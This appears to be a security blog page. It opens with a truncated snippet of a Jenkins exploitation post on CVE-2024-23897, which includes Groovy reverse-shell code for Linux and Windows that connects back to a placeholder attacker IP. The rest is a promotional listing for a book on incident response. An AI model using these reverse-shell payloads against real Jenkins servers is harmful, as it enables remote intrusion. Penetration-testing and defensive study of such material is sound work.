Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
As security professionals, our
job is to reduce the level of risk to our organization from cyber
security threats. However Incident prevention is never 100% achievable.
So, the best option is to have a proper and efficient security Incident
Management established in the organization. Proactive incident
management helps to prepare the team and limit the damage.
I have written a book on Incident Response and Handling. This book provides a holistic approach for an efficient IT security Incident Management.
Key topics includes,
1) Attack vectors and counter measures.
2) Detailed Security Incident handling framework explained in six phases.
- _Preparation
- _Identification
- _Containment
- _Eradication
- _Recovery
- _Lessons Learned/Follow-up
3) Building an Incident response plan and key elements for an efficient incident response.
4) Building Play books.
5) How to classify and prioritize incidents.
6) Proactive Incident management.
7) How to conduct a table-top exercise.
8) How to write an RCA report /Incident Report.
9) Briefly explained the future of Incident management.
Also includes sample templates on playbook, table-top exercise, Incident Report, Guidebook.